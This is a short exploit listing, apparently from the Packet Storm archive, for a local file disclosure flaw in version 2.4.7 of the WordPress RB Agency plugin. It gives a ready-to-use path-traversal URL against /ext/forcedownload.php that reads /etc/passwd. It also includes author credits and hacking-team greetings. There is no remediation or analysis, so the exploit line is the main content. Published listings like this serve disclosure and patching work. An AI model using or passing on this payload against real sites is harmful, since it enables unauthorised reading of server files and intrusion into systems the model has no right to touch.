WordPress RB Agency 2.4.7 File Disclosure

2016-09-04T00:00:00
ID PACKETSTORM:138598
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-09-04T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://rbplugin.com/  
# Category [ Webapps ]  
# Tested on [ Win ]  
# Version : 2.4.7  
# Date 2016/09/03  
######################  
#  
# PoC  
# The Vulnerable page is  
# /ext/forcedownload.php  
#  
# http://www.Target.com/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd   
# Youtube:https://youtu.be/5kE8Xt-My9A  
######################  
# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com  
# B3li3v3 M3 I will n3v3r St0p  
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`